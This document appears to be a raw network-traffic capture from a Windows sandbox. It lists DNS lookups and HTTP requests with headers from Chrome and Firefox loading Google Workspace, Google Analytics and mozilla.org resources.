sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/mFX4RtYSpBwXZXB71FNeXM6v9iEcAsCYoEWvaA0SJB_EfOi2TvXNJ455zRiaCZb-_IiTsbEDlOWQi1Y2as2t_9rzUQe6zkldGInt=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /mFX4RtYSpBwXZXB71FNeXM6v9iEcAsCYoEWvaA0SJB_EfOi2TvXNJ455zRiaCZb-_IiTsbEDlOWQi1Y2as2t_9rzUQe6zkldGInt=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/RzrCOW3W04EKFPlpQeagbcX-3FrUDfpa7qKhYBVJq0KQxjfBwoRBHGJpTWM2FAQgqioEmE5OxwLslpmuHpN-zD2mqY_AWKj95bsE=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /RzrCOW3W04EKFPlpQeagbcX-3FrUDfpa7qKhYBVJq0KQxjfBwoRBHGJpTWM2FAQgqioEmE5OxwLslpmuHpN-zD2mqY_AWKj95bsE=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

storage.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

storage.googleapis.com

IN A

Response

storage.googleapis.com

IN A

216.58.204.91

storage.googleapis.com

IN A

142.250.178.27

storage.googleapis.com

IN A

216.58.212.219

storage.googleapis.com

IN A

216.58.201.123

storage.googleapis.com

IN A

216.58.212.251

storage.googleapis.com

IN A

142.250.187.251

storage.googleapis.com

IN A

172.217.16.251

storage.googleapis.com

IN A

142.250.187.219

storage.googleapis.com

IN A

172.217.169.91

storage.googleapis.com

IN A

142.250.180.27

storage.googleapis.com

IN A

216.58.213.27

storage.googleapis.com

IN A

142.250.200.27

storage.googleapis.com

IN A

142.250.200.59

storage.googleapis.com

IN A

142.250.179.251
DNS

ssl.google-analytics.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssl.google-analytics.com

IN A

Response

ssl.google-analytics.com

IN A

216.58.204.72
GET

https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-3652TCzauH9jaL0QJ8H6FM-bfed64c7e8da9ac20d439f436570f955-Drive_Full_Logo_2x.svg

chrome.exe

Remote address:

216.58.204.91:443

Request

GET /assets_workspace/uploads/7uffzv9dk4sn-3652TCzauH9jaL0QJ8H6FM-bfed64c7e8da9ac20d439f436570f955-Drive_Full_Logo_2x.svg HTTP/2.0
host: storage.googleapis.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-7LhoZoRSU32Sn20yI8213k-92d83d07ba564bddac887d329c3589c2-Vector.svg

chrome.exe

Remote address:

216.58.204.91:443

Request

GET /assets_workspace/uploads/7uffzv9dk4sn-7LhoZoRSU32Sn20yI8213k-92d83d07ba564bddac887d329c3589c2-Vector.svg HTTP/2.0
host: storage.googleapis.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

content-autofill.googleapis.com

chrome.exe

Remote address:

8.8.8.8:53

Request

content-autofill.googleapis.com

IN A

Response

content-autofill.googleapis.com

IN A

216.58.201.106

content-autofill.googleapis.com

IN A

142.250.187.202

content-autofill.googleapis.com

IN A

172.217.169.74

content-autofill.googleapis.com

IN A

172.217.169.10

content-autofill.googleapis.com

IN A

142.250.180.10

content-autofill.googleapis.com

IN A

216.58.212.234

content-autofill.googleapis.com

IN A

142.250.187.234

content-autofill.googleapis.com

IN A

172.217.16.234

content-autofill.googleapis.com

IN A

142.250.200.42

content-autofill.googleapis.com

IN A

216.58.204.74

content-autofill.googleapis.com

IN A

216.58.212.202

content-autofill.googleapis.com

IN A

142.250.179.234

content-autofill.googleapis.com

IN A

142.250.200.10

content-autofill.googleapis.com

IN A

172.217.169.42

content-autofill.googleapis.com

IN A

142.250.178.10
GET

https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTIzLjAuNjMxMi4xMjMSIAmQPV0x4uaegxIFDQ-obAwSBQ3-OcPhIWJhcZEEvqEs?alt=proto

chrome.exe

Remote address:

216.58.201.106:443

Request

GET /v1/pages/ChVDaHJvbWUvMTIzLjAuNjMxMi4xMjMSIAmQPV0x4uaegxIFDQ-obAwSBQ3-OcPhIWJhcZEEvqEs?alt=proto HTTP/2.0
host: content-autofill.googleapis.com
x-goog-encode-response-if-executable: base64
x-goog-api-key: AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
x-client-data: COHsygE=
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

46.200.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

46.200.250.142.in-addr.arpa

IN PTR

Response

46.200.250.142.in-addr.arpa

IN PTR

lhr48s30-in-f141e100net
DNS

227.187.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

227.187.250.142.in-addr.arpa

IN PTR

Response

227.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f31e100net
DNS

195.187.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

195.187.250.142.in-addr.arpa

IN PTR

Response

195.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f31e100net
DNS

71.96.94.141.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

71.96.94.141.in-addr.arpa

IN PTR

Response

71.96.94.141.in-addr.arpa

IN PTR

ns31430745ip-141-94-96eu
DNS

71.96.94.141.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

71.96.94.141.in-addr.arpa

IN PTR

Response

71.96.94.141.in-addr.arpa

IN PTR

ns31430745ip-141-94-96eu
DNS

33.200.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

33.200.250.142.in-addr.arpa

IN PTR

Response

33.200.250.142.in-addr.arpa

IN PTR

lhr48s30-in-f11e100net
DNS

72.204.58.216.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

72.204.58.216.in-addr.arpa

IN PTR

Response

72.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f81e100net

72.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f8�G

72.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f72�G
DNS

91.204.58.216.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

91.204.58.216.in-addr.arpa

IN PTR

Response

91.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f271e100net

91.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f91�H

91.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f27�H
DNS

106.201.58.216.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

106.201.58.216.in-addr.arpa

IN PTR

Response

106.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f101e100net

106.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f106�I

106.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f10�I
DNS

region1.google-analytics.com

firefox.exe

Remote address:

8.8.8.8:53

Request

region1.google-analytics.com

IN A

Response

region1.google-analytics.com

IN A

216.239.34.36

region1.google-analytics.com

IN A

216.239.32.36
POST

https://region1.google-analytics.com/g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736790032880&gcs=G101&gcd=13q3r3l3l5l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&ul=en&cid=239575487.1736790034&sr=1280x720&_ng=1&ir=1&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&frm=0&pscdl=denied&_eu=EA&_s=1&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736790033&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=page_view&_fv=1&_nsi=1&_ss=1&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x680&ep.is_rivendell=true&ep.is_eea=false&tfd=1723

chrome.exe

Remote address:

216.239.34.36:443

Request

POST /g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736790032880&gcs=G101&gcd=13q3r3l3l5l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&ul=en&cid=239575487.1736790034&sr=1280x720&_ng=1&ir=1&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&frm=0&pscdl=denied&_eu=EA&_s=1&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736790033&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=page_view&_fv=1&_nsi=1&_ss=1&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x680&ep.is_rivendell=true&ep.is_eea=false&tfd=1723 HTTP/2.0
host: region1.google-analytics.com
content-length: 0
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://workspace.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

apis.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

apis.google.com

IN A

Response

apis.google.com

IN CNAME

plus.l.google.com

plus.l.google.com

IN A

142.250.178.14
DNS

apis.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

apis.google.com

IN A

Response

apis.google.com

IN CNAME

plus.l.google.com

plus.l.google.com

IN A

142.250.178.14
GET

https://apis.google.com/js/client.js

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /js/client.js HTTP/2.0
host: apis.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
DNS

14.200.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

14.200.250.142.in-addr.arpa

IN PTR

Response

14.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f141e100net
DNS

36.34.239.216.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

36.34.239.216.in-addr.arpa

IN PTR

Response
DNS

14.178.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

14.178.250.142.in-addr.arpa

IN PTR

Response

14.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f141e100net
DNS

www.mozilla.org

firefox.exe

Remote address:

8.8.8.8:53

Request

www.mozilla.org

IN A

Response

www.mozilla.org

IN CNAME

www-mozilla.fastly-edge.com

www-mozilla.fastly-edge.com

IN A

151.101.131.19

www-mozilla.fastly-edge.com

IN A

151.101.195.19

www-mozilla.fastly-edge.com

IN A

151.101.67.19

www-mozilla.fastly-edge.com

IN A

151.101.3.19
DNS

www.mozilla.org

firefox.exe

Remote address:

8.8.8.8:53

Request

www.mozilla.org

IN A

Response

www.mozilla.org

IN CNAME

www-mozilla.fastly-edge.com

www-mozilla.fastly-edge.com

IN A

151.101.3.19

www-mozilla.fastly-edge.com

IN A

151.101.195.19

www-mozilla.fastly-edge.com

IN A

151.101.67.19

www-mozilla.fastly-edge.com

IN A

151.101.131.19
GET

https://www.mozilla.org/firefox/welcome/21/

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /firefox/welcome/21/ HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 302

server: granian
content-type: text/html; charset=utf-8
location: /en-US/firefox/welcome/21/
x-backend-server: bedrock-57bc8d57b4-zmpx6.gcp-us-west1
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
cross-origin-opener-policy: same-origin
via: 1.1 google, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 2654
x-served-by: cache-lcy-eglc8600071-LCY
x-cache: HIT
x-cache-hits: 1
x-timer: S1736790039.326929,VS0,VE1
vary: Accept-Language
content-length: 0
GET

https://www.mozilla.org/en-US/firefox/welcome/21/

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /en-US/firefox/welcome/21/ HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

server: granian
content-type: text/html; charset=utf-8
x-frame-options: DENY
content-security-policy: frame-src *.mozilla.com www.googletagmanager.com *.mozilla.org js.stripe.com *.mozilla.net 'self' www.youtube.com accounts.firefox.com www.google-analytics.com; font-src *.mozilla.com 'self' *.mozilla.org *.mozilla.net; default-src *.mozilla.com 'self' *.mozilla.org *.mozilla.net; child-src *.mozilla.com www.googletagmanager.com *.mozilla.org js.stripe.com *.mozilla.net 'self' www.youtube.com accounts.firefox.com www.google-analytics.com; connect-src *.mozilla.com www.googletagmanager.com *.mozilla.org https://accounts.firefox.com/ *.mozilla.net cjms.services.mozilla.com 'self' stage.cjms.nonprod.cloudops.mozgcp.net region1.google-analytics.com o1069899.sentry.io o1069899.ingest.sentry.io sentry.prod.mozaws.net www.google-analytics.com; img-src *.mozilla.com data: www.googletagmanager.com *.mozilla.org *.mozilla.net 'self' images.ctfassets.net www.google-analytics.com; script-src *.mozilla.com tagmanager.google.com www.googletagmanager.com *.mozilla.org 'unsafe-eval' js.stripe.com *.mozilla.net 'unsafe-inline' s.ytimg.com 'self' www.youtube.com www.google-analytics.com; style-src *.mozilla.com *.mozilla.org *.mozilla.net 'unsafe-inline' 'self'; upgrade-insecure-requests; frame-ancestors 'none'
content-security-policy-report-only: media-src 'self' assets.mozilla.net videos.cdn.mozilla.net; frame-src *.mozilla.com www.googletagmanager.com *.mozilla.org js.stripe.com *.mozilla.net 'self' www.youtube.com accounts.firefox.com www.google-analytics.com; font-src *.mozilla.com 'self' *.mozilla.org *.mozilla.net; default-src 'self'; child-src *.mozilla.com www.googletagmanager.com *.mozilla.org js.stripe.com *.mozilla.net 'self' www.youtube.com accounts.firefox.com www.google-analytics.com; connect-src *.mozilla.com www.googletagmanager.com *.mozilla.org https://accounts.firefox.com/ *.mozilla.net cjms.services.mozilla.com 'self' stage.cjms.nonprod.cloudops.mozgcp.net region1.google-analytics.com o1069899.sentry.io o1069899.ingest.sentry.io sentry.prod.mozaws.net www.google-analytics.com; img-src *.mozilla.com data: www.googletagmanager.com *.mozilla.org *.mozilla.net 'self' images.ctfassets.net www.google-analytics.com; script-src *.mozilla.com tagmanager.google.com www.googletagmanager.com *.mozilla.org 'unsafe-eval' js.stripe.com *.mozilla.net 'unsafe-inline' s.ytimg.com 'self' www.youtube.com www.google-analytics.com; style-src *.mozilla.com *.mozilla.org *.mozilla.net 'self'; base-uri 'none'; object-src 'none'; upgrade-insecure-requests; frame-ancestors 'none'
cache-control: max-age=600
expires: Mon, 13 Jan 2025 14:28:14 GMT
x-clacks-overhead: GNU Terry Pratchett
content-language: en-US
etag: "0095a183c3df61fd3e5ac4d43844f586"
x-backend-server: bedrock-57bc8d57b4-nnj2f.gcp-us-west1
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
cross-origin-opener-policy: same-origin
via: 1.1 google, 1.1 varnish
content-encoding: br
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 102
x-served-by: cache-lcy-eglc8600071-LCY
x-cache: HIT
x-cache-hits: 1
x-timer: S1736790039.364561,VS0,VE3
vary: Accept-Encoding
content-length: 6096
GET

https://www.mozilla.org/media/js/site.b49d941e3374.js

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/js/site.b49d941e3374.js HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-guploader-uploadid: AFiumC5qoyRV_xqs97BFXIYWjzHphlRpOG8ncCAfRstOOChYTxq7vPO_G6TVeSO_ReoypQZBzvXAPj4
x-goog-generation: 1733837360340772
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 5895
x-goog-meta-goog-reserved-file-mtime: 1733837258
x-goog-hash: crc32c=60FKGQ==
x-goog-hash: md5=tJ2UHjN0uFrhrv9GUPRd3Q==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
server: UploadServer
expires: Sat, 21 Dec 2024 13:56:53 GMT
last-modified: Tue, 17 Dec 2024 23:38:58 GMT
etag: "b49d941e3374b85ae1aeff4650f45ddd"
content-type: text/javascript
content-encoding: br
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 1917826
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-kbfi7400094-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 24, 3293
x-timer: S1736790040.584595,VS0,VE0
vary: Accept-Encoding
content-length: 2051
GET

https://www.mozilla.org/media/css/m24-root.77a146bcaf17.css

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/css/m24-root.77a146bcaf17.css HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/css,*/*;q=0.1
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: style
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

expires: Fri, 06 Dec 2024 20:55:17 GMT
last-modified: Fri, 06 Dec 2024 19:50:35 GMT
etag: "77a146bcaf17a36a99bcd9699951f44e"
x-goog-generation: 1733514635615093
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 4280
x-goog-meta-goog-reserved-file-mtime: 1733514602
content-type: text/css
x-goog-hash: crc32c=Pvc2kw==
x-goog-hash: md5=d6FGvK8Xo2qZvNlpmVH0Tg==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AFiumC6yDmUTP9bZn2XPfo9s6TPLQHtp-lftUIHIzVYfDw-31Nvui17yq3vY1vCf2WAP-Ydj8T8U979FuQ
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 202182
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300041-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 5, 2577
x-timer: S1736790040.585514,VS0,VE0
content-length: 4280
GET

https://www.mozilla.org/media/css/m24-navigation-and-footer.e8f9c32ba5aa.css

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/css/m24-navigation-and-footer.e8f9c32ba5aa.css HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/css,*/*;q=0.1
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: style
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-guploader-uploadid: AFIdbgSubpoCHNsHAWV2grIQooraliVXFusbLP98L6_vVINZAXXZy_SKdwzQIQMnUuIJ7Kcw
expires: Mon, 13 Jan 2025 15:07:08 GMT
last-modified: Mon, 13 Jan 2025 14:01:21 GMT
etag: "e8f9c32ba5aa777732eb28d0ed89dc65"
x-goog-generation: 1736776881293912
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 37717
x-goog-meta-goog-reserved-file-mtime: 1736776839
content-type: text/css
x-goog-hash: crc32c=vpgJ+w==
x-goog-hash: md5=6PnDK6Wqd3cy6yjQ7YncZQ==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
server: UploadServer
content-encoding: br
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 12810
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300049-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 387
x-timer: S1736790040.585517,VS0,VE0
vary: Accept-Encoding
content-length: 5024
GET

https://www.mozilla.org/media/css/protocol-firefox.e581097aaf66.css

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/css/protocol-firefox.e581097aaf66.css HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/css,*/*;q=0.1
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: style
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-guploader-uploadid: AFIdbgT-lKOFa_5Pyn2dVrHQ0TclHUuVTecaSa_ojS4EQs0hpir-ze-IDk1BWrlIfZ2Kd2Y2
expires: Mon, 13 Jan 2025 15:07:08 GMT
last-modified: Mon, 13 Jan 2025 14:01:22 GMT
etag: "e581097aaf662199b921ccc6d941b07c"
x-goog-generation: 1736776882882721
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 90937
x-goog-meta-goog-reserved-file-mtime: 1736776839
content-type: text/css
x-goog-hash: crc32c=7Y0vTw==
x-goog-hash: md5=5YEJeq9mIZm5IczG2UGwfA==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
server: UploadServer
content-encoding: br
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 12810
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300086-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 19, 224
x-timer: S1736790040.585895,VS0,VE0
vary: Accept-Encoding
content-length: 11975
GET

https://www.mozilla.org/media/css/protocol-picto.cfee40a3cd36.css

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/css/protocol-picto.cfee40a3cd36.css HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/css,*/*;q=0.1
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: style
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-goog-generation: 1730716181455966
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 1377
x-goog-meta-goog-reserved-file-mtime: 1730716110
x-goog-hash: crc32c=UD4tow==
x-goog-hash: md5=tbfIhfj6+ouFjjEJUgeQAw==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
